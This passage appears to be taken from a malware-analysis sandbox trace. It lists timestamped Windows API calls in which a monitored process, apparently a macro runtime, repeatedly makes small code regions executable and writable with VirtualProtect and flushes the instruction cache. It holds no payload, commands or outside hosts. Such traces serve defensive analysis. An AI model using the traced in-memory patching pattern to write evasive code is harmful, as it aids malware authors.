returned 1 [0112.045] GetCurrentProcess () returned 0xffffffff [0112.045] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00e8, dwSize=0x14) returned 1 [0112.045] VirtualProtect (in: lpAddress=0xf5d00e8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.046] GetCurrentProcess () returned 0xffffffff [0112.046] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00e9, dwSize=0x2) returned 1 [0112.046] GetCurrentProcess () returned 0xffffffff [0112.046] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0108, dwSize=0x14) returned 1 [0112.046] VirtualProtect (in: lpAddress=0xf5d0108, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.046] GetCurrentProcess () returned 0xffffffff [0112.046] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0109, dwSize=0x2) returned 1 [0112.046] GetCurrentProcess () returned 0xffffffff [0112.046] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0128, dwSize=0x14) returned 1 [0112.046] VirtualProtect (in: lpAddress=0xf5d0128, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.047] GetCurrentProcess () returned 0xffffffff [0112.047] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0129, dwSize=0x2) returned 1 [0112.047] GetCurrentProcess () returned 0xffffffff [0112.047] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0148, dwSize=0x14) returned 1 [0112.047] VirtualProtect (in: lpAddress=0xf5d0148, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.047] GetCurrentProcess () returned 0xffffffff [0112.047] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0149, dwSize=0x2) returned 1 [0112.047] GetCurrentProcess () returned 0xffffffff [0112.047] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0168, dwSize=0x14) returned 1 [0112.047] VirtualProtect (in: lpAddress=0xf5d0168, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.048] GetCurrentProcess () returned 0xffffffff [0112.048] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0169, dwSize=0x2) returned 1 [0112.048] GetCurrentProcess () returned 0xffffffff [0112.048] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0188, dwSize=0x14) returned 1 [0112.048] VirtualProtect (in: lpAddress=0xf5d0188, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.050] GetCurrentProcess () returned 0xffffffff [0112.050] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0189, dwSize=0x2) returned 1 [0112.050] GetCurrentProcess () returned 0xffffffff [0112.050] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d01a8, dwSize=0x14) returned 1 [0112.050] VirtualProtect (in: lpAddress=0xf5d01a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.050] GetCurrentProcess () returned 0xffffffff [0112.051] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d01a9, dwSize=0x2) returned 1 [0112.051] GetCurrentProcess () returned 0xffffffff [0112.051] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d01c8, dwSize=0x14) returned 1 [0112.051] VirtualProtect (in: lpAddress=0xf5d01c8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.051] GetCurrentProcess () returned 0xffffffff [0112.051] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d01c9, dwSize=0x2) returned 1 [0112.051] GetCurrentProcess () returned 0xffffffff [0112.051] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d01e8, dwSize=0x14) returned 1 [0112.051] VirtualProtect (in: lpAddress=0xf5d01e8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.052] GetCurrentProcess () returned 0xffffffff [0112.052] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d01e9, dwSize=0x2) returned 1 [0112.052] GetCurrentProcess () returned 0xffffffff [0112.052] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0208, dwSize=0x14) returned 1 [0112.052] VirtualProtect (in: lpAddress=0xf5d0208, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.053] GetCurrentProcess () returned 0xffffffff [0112.053] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0209, dwSize=0x2) returned 1 [0112.053] GetCurrentProcess () returned 0xffffffff [0112.053] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0228, dwSize=0x14) returned 1 [0112.053] VirtualProtect (in: lpAddress=0xf5d0228, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.053] GetCurrentProcess () returned 0xffffffff [0112.053] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0229, dwSize=0x2) returned 1 [0112.053] GetCurrentProcess () returned 0xffffffff [0112.053] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b4868, dwSize=0x14) returned 1 [0112.053] VirtualProtect (in: lpAddress=0xc8b4868, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.054] GetCurrentProcess () returned 0xffffffff [0112.054] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b4869, dwSize=0x2) returned 1 [0112.054] GetCurrentProcess () returned 0xffffffff [0112.054] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b4888, dwSize=0x14) returned 1 [0112.054] VirtualProtect (in: lpAddress=0xc8b4888, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.054] GetCurrentProcess () returned 0xffffffff [0112.054] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b4889, dwSize=0x2) returned 1 [0112.054] GetCurrentProcess () returned 0xffffffff [0112.054] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b48a8, dwSize=0x14) returned 1 [0112.054] VirtualProtect (in: lpAddress=0xc8b48a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.055] GetCurrentProcess () returned 0xffffffff [0112.055] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b48a9, dwSize=0x2) returned 1 [0112.055] GetAsyncKeyState (vKey=3) returned 0 [0112.055] VarCmp (pvarLeft=0x197dcc, pvarRight=0x197dbc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.056] CRetailMalloc_Alloc () returned 0xcc1af48 [0112.056] memcpy (in: _Dst=0xd015168, _Src=0x1976bc, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0112.056] memcpy (in: _Dst=0xcc1af68, _Src=0x197724, _Size=0x18 | out: _Dst=0xcc1af68) returned 0xcc1af68 [0112.056] CRetailMalloc_Realloc () returned 0xcc1af48 [0112.056] CRetailMalloc_Free () returned 0x1 [0112.056] GetCurrentProcess () returned 0xffffffff [0112.056] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601714, dwSize=0x14) returned 1 [0112.056] VirtualProtect (in: lpAddress=0xf601714, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.056] GetCurrentProcess () returned 0xffffffff [0112.056] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601715, dwSize=0x2) returned 1 [0112.056] GetCurrentProcess () returned 0xffffffff [0112.056] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601734, dwSize=0x14) returned 1 [0112.056] VirtualProtect (in: lpAddress=0xf601734, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.057] GetCurrentProcess () returned 0xffffffff [0112.057] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601735, dwSize=0x2) returned 1 [0112.057] GetCurrentProcess () returned 0xffffffff [0112.057] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601754, dwSize=0x14) returned 1 [0112.057] VirtualProtect (in: lpAddress=0xf601754, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.057] GetCurrentProcess () returned 0xffffffff [0112.057] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601755, dwSize=0x2) returned 1 [0112.057] GetCurrentProcess () returned 0xffffffff [0112.057] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601774, dwSize=0x14) returned 1 [0112.057] VirtualProtect (in: lpAddress=0xf601774, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.058] GetCurrentProcess () returned 0xffffffff [0112.058] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601775, dwSize=0x2) returned 1 [0112.058] GetCurrentProcess () returned 0xffffffff [0112.058] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601794, dwSize=0x14) returned 1 [0112.058] VirtualProtect (in: lpAddress=0xf601794, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.059] GetCurrentProcess () returned 0xffffffff [0112.059] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601795, dwSize=0x2) returned 1 [0112.059] GetCurrentProcess () returned 0xffffffff [0112.059] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017b4, dwSize=0x14) returned 1 [0112.059] VirtualProtect (in: lpAddress=0xf6017b4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.062] GetCurrentProcess () returned 0xffffffff [0112.062] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017b5, dwSize=0x2) returned 1 [0112.062] GetCurrentProcess () returned 0xffffffff [0112.062] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017d4, dwSize=0x14) returned 1 [0112.062] VirtualProtect (in: lpAddress=0xf6017d4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.063] GetCurrentProcess () returned 0xffffffff [0112.063] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017d5, dwSize=0x2) returned 1 [0112.063] GetCurrentProcess () returned 0xffffffff [0112.063] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017f4, dwSize=0x14) returned 1 [0112.063] VirtualProtect (in: lpAddress=0xf6017f4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.063] GetCurrentProcess () returned 0xffffffff [0112.064] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017f5, dwSize=0x2) returned 1 [0112.064] GetCurrentProcess () returned 0xffffffff [0112.064] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601814, dwSize=0x14) returned 1 [0112.064] VirtualProtect (in: lpAddress=0xf601814, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.065] GetCurrentProcess () returned 0xffffffff [0112.065] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601815, dwSize=0x2) returned 1 [0112.065] GetCurrentProcess () returned 0xffffffff [0112.065] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601834, dwSize=0x14) returned 1 [0112.065] VirtualProtect (in: lpAddress=0xf601834, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.065] GetCurrentProcess () returned 0xffffffff [0112.065] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601835, dwSize=0x2) returned 1 [0112.065] GetCurrentProcess () returned 0xffffffff [0112.065] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601854, dwSize=0x14) returned 1 [0112.065] VirtualProtect (in: lpAddress=0xf601854, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.066] GetCurrentProcess () returned 0xffffffff [0112.066] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601855, dwSize=0x2) returned 1 [0112.066] GetCurrentProcess () returned 0xffffffff [0112.066] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601874, dwSize=0x14) returned 1 [0112.066] VirtualProtect (in: lpAddress=0xf601874, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.067] GetCurrentProcess () returned 0xffffffff [0112.067] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601875, dwSize=0x2) returned 1 [0112.067] GetCurrentProcess () returned 0xffffffff [0112.067] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0048, dwSize=0x14) returned 1 [0112.067] VirtualProtect (in: lpAddress=0xf5d0048, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.067] GetCurrentProcess () returned 0xffffffff [0112.067] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0049, dwSize=0x2) returned 1 [0112.067] GetCurrentProcess () returned 0xffffffff [0112.067] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0068, dwSize=0x14) returned 1 [0112.067] VirtualProtect (in: lpAddress=0xf5d0068, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.068] GetCurrentProcess () returned 0xffffffff [0112.068] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0069, dwSize=0x2) returned 1 [0112.068] GetCurrentProcess () returned 0xffffffff [0112.068] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0088, dwSize=0x14) returned 1 [0112.068] VirtualProtect (in: lpAddress=0xf5d0088, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.069] GetCurrentProcess () returned 0xffffffff [0112.069] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0089, dwSize=0x2) returned 1 [0112.069] GetCurrentProcess () returned 0xffffffff [0112.069] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00a8, dwSize=0x14) returned 1 [0112.069] VirtualProtect (in: lpAddress=0xf5d00a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.069] GetCurrentProcess () returned 0xffffffff [0112.069] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00a9, dwSize=0x2) returned 1 [0112.069] GetCurrentProcess () returned 0xffffffff [0112.069] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00c8, dwSize=0x14) returned 1 [0112.069] VirtualProtect (in: lpAddress=0xf5d00c8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.070] GetCurrentProcess () returned 0xffffffff [0112.070] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00c9, dwSize=0x2) returned 1 [0112.070] GetCurrentProcess () returned 0xffffffff [0112.070] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00e8, dwSize=0x14) returned 1 [0112.070] VirtualProtect (in: lpAddress=0xf5d00e8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.071] GetCurrentProcess () returned 0xffffffff [0112.071] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00e9, dwSize=0x2) returned 1 [0112.071] GetCurrentProcess () returned 0xffffffff [0112.071] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0108, dwSize=0x14) returned 1 [0112.071] VirtualProtect (in: lpAddress=0xf5d0108, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.071] GetCurrentProcess () returned 0xffffffff [0112.071] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0109, dwSize=0x2) returned 1 [0112.071] GetCurrentProcess () returned 0xffffffff [0112.071] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0128, dwSize=0x14) returned 1 [0112.071] VirtualProtect (in: lpAddress=0xf5d0128, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.072] GetCurrentProcess () returned 0xffffffff [0112.072] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0129, dwSize=0x2) returned 1 [0112.072] GetCurrentProcess () returned 0xffffffff [0112.072] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0148, dwSize=0x14) returned 1 [0112.072] VirtualProtect (in: lpAddress=0xf5d0148, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.073] GetCurrentProcess () returned 0xffffffff [0112.073] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0149, dwSize=0x2) returned 1 [0112.073] GetCurrentProcess () returned 0xffffffff [0112.073] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0168, dwSize=0x14) returned 1 [0112.073] VirtualProtect (in: lpAddress=0xf5d0168, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.073] GetCurrentProcess () returned 0xffffffff [0112.073] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0169, dwSize=0x2) returned 1 [0112.073] GetCurrentProcess () returned 0xffffffff [0112.073] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0188, dwSize=0x14) returned 1 [0112.073] VirtualProtect (in: lpAddress=0xf5d0188, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.074] GetCurrentProcess () returned 0xffffffff [0112.074] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0189, dwSize=0x2) returned 1 [0112.074] GetCurrentProcess () returned 0xffffffff [0112.074] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d01a8, dwSize=0x14) returned 1 [0112.074] VirtualProtect (in: lpAddress=0xf5d01a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.074] GetCurrentProcess () returned 0xffffffff [0112.075] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d01a9, dwSize=0x2) returned 1 [0112.075] GetCurrentProcess () returned 0xffffffff [0112.075] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d01c8, dwSize=0x14) returned 1 [0112.075] VirtualProtect (in: lpAddress=0xf5d01c8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.075] GetCurrentProcess () returned 0xffffffff [0112.075] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d01c9, dwSize=0x2) returned 1 [0112.075] GetCurrentProcess () returned 0xffffffff [0112.075] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d01e8, dwSize=0x14) returned 1 [0112.075] VirtualProtect (in: lpAddress=0xf5d01e8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.076] GetCurrentProcess () returned 0xffffffff [0112.076] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d01e9, dwSize=0x2) returned 1 [0112.076] GetCurrentProcess () returned 0xffffffff [0112.076] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0208, dwSize=0x14) returned 1 [0112.076] VirtualProtect (in: lpAddress=0xf5d0208, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.076] GetCurrentProcess () returned 0xffffffff [0112.077] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0209, dwSize=0x2) returned 1 [0112.077] GetCurrentProcess () returned 0xffffffff [0112.077] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0228, dwSize=0x14) returned 1 [0112.077] VirtualProtect (in: lpAddress=0xf5d0228, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.077] GetCurrentProcess () returned 0xffffffff [0112.077] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0229, dwSize=0x2) returned 1 [0112.077] GetCurrentProcess () returned 0xffffffff [0112.077] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b4868, dwSize=0x14) returned 1 [0112.077] VirtualProtect (in: lpAddress=0xc8b4868, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.078] GetCurrentProcess () returned 0xffffffff [0112.078] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b4869, dwSize=0x2) returned 1 [0112.078] GetCurrentProcess () returned 0xffffffff [0112.078] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b4888, dwSize=0x14) returned 1 [0112.078] VirtualProtect (in: lpAddress=0xc8b4888, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.078] GetCurrentProcess () returned 0xffffffff [0112.078] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b4889, dwSize=0x2) returned 1 [0112.079] GetCurrentProcess () returned 0xffffffff [0112.079] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b48a8, dwSize=0x14) returned 1 [0112.079] VirtualProtect (in: lpAddress=0xc8b48a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.079] GetCurrentProcess () returned 0xffffffff [0112.079] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b48a9, dwSize=0x2) returned 1 [0112.094] GetAsyncKeyState (vKey=3) returned 0 [0112.095] VarCmp (pvarLeft=0x197dcc, pvarRight=0x197dbc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.095] CRetailMalloc_Alloc () returned 0xcc1afa8 [0112.095] memcpy (in: _Dst=0xd015168, _Src=0x1976bc, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0112.095] memcpy (in: _Dst=0xcc1afc8, _Src=0x197724, _Size=0x18 | out: _Dst=0xcc1afc8) returned 0xcc1afc8 [0112.095] CRetailMalloc_Realloc () returned 0xcc1afa8 [0112.095] CRetailMalloc_Free () returned 0x1 [0112.095] GetCurrentProcess () returned 0xffffffff [0112.095] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601714, dwSize=0x14) returned 1 [0112.095] VirtualProtect (in: lpAddress=0xf601714, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.096] GetCurrentProcess () returned 0xffffffff [0112.096] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601715, dwSize=0x2) returned 1 [0112.096] GetCurrentProcess () returned 0xffffffff [0112.096] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601734, dwSize=0x14) returned 1 [0112.096] VirtualProtect (in: lpAddress=0xf601734, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.097] GetCurrentProcess () returned 0xffffffff [0112.097] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601735, dwSize=0x2) returned 1 [0112.097] GetCurrentProcess () returned 0xffffffff [0112.097] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601754, dwSize=0x14) returned 1 [0112.097] VirtualProtect (in: lpAddress=0xf601754, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.098] GetCurrentProcess () returned 0xffffffff [0112.098] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601755, dwSize=0x2) returned 1 [0112.098] GetCurrentProcess () returned 0xffffffff [0112.098] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601774, dwSize=0x14) returned 1 [0112.098] VirtualProtect (in: lpAddress=0xf601774, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.098] GetCurrentProcess () returned 0xffffffff [0112.098] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601775, dwSize=0x2) returned 1 [0112.098] GetCurrentProcess () returned 0xffffffff [0112.098] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601794, dwSize=0x14) returned 1 [0112.098] VirtualProtect (in: lpAddress=0xf601794, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.099] GetCurrentProcess () returned 0xffffffff [0112.099] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601795, dwSize=0x2) returned 1 [0112.099] GetCurrentProcess () returned 0xffffffff [0112.099] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017b4, dwSize=0x14) returned 1 [0112.099] VirtualProtect (in: lpAddress=0xf6017b4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.100] GetCurrentProcess () returned 0xffffffff [0112.100] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017b5, dwSize=0x2) returned 1 [0112.100] GetCurrentProcess () returned 0xffffffff [0112.100] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017d4, dwSize=0x14) returned 1 [0112.100] VirtualProtect (in: lpAddress=0xf6017d4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.100] GetCurrentProcess () returned 0xffffffff [0112.100] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017d5, dwSize=0x2) returned 1 [0112.100] GetCurrentProcess () returned 0xffffffff [0112.100] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017f4, dwSize=0x14) returned 1 [0112.100] VirtualProtect (in: lpAddress=0xf6017f4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.101] GetCurrentProcess () returned 0xffffffff [0112.101] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017f5, dwSize=0x2) returned 1 [0112.101] GetCurrentProcess () returned 0xffffffff [0112.101] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601814, dwSize=0x14) returned 1 [0112.101] VirtualProtect (in: lpAddress=0xf601814, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.102] GetCurrentProcess () returned 0xffffffff [0112.102] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601815, dwSize=0x2) returned 1 [0112.102] GetCurrentProcess () returned 0xffffffff [0112.102] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601834, dwSize=0x14) returned 1 [0112.102] VirtualProtect (in: lpAddress=0xf601834, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0112.102] GetCurrentProcess () returned 0xffffffff [0112.102] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601835, dwSize=0x2) returned 1 [0112.102] 